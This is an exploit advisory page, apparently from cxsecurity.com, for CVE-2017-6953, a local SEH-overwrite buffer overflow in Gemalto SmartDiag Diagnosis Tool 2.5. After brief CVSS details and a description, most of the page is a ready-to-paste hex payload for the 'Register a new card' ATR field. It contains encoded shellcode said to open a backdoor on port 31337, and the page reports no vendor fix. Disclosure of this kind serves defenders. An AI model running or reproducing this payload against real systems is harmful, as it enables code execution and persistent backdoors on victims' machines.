Gemalto SmartDiag Diagnosis Tool 2.5 Buffer Overflow

Published
Credit
Risk
2017.05.09
Majid Alqabandi
High
CWE
CVE
Local
Remote
CWE-119
CVE-2017-6953
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.6/10
6.4/10
3.9/10
Exploit range
Attack complexity
Authentication
Local
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.

1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.



2. Proof of Concept

The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):

528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com